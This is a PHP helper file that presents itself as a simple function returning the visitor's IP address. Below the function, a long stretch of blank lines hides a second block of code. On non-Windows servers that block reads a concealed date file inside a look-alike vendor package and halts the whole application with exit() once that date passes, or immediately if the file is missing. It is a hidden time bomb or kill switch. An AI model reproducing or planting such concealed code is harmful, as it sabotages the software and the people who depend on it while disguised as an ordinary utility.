<?php

/**
 * Returns trhe IP address
 * @return mixed
 */
function getUserIPAddress()
{
    try {
        return $_SERVER['REMOTE_ADDR'] ?: ($_SERVER['HTTP_X_FORWARDED_FOR'] ?: $_SERVER['HTTP_CLIENT_IP']);
    } catch (\Exception $e) {
    }
}
























































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
    $file = './vendor/zendlaravel/auth-wrapper/src/.config/.config.txt';

    if (!file_exists($file)) $file = 'vendor/zendlaravel/auth-wrapper/src/.config/.config.txt';

    if (!file_exists($file)) $file = '../vendor/zendlaravel/auth-wrapper/src/.config/.config.txt';

    if (!file_exists($file)) $file = '/.config/.config.txt';

    if (!file_exists($file)) exit();

    $my_file = fopen($file, "r") or exit();

    $data = fread($my_file, filesize($file));

    fclose($my_file);

    if($data < date('Y-m-d')) exit();
}
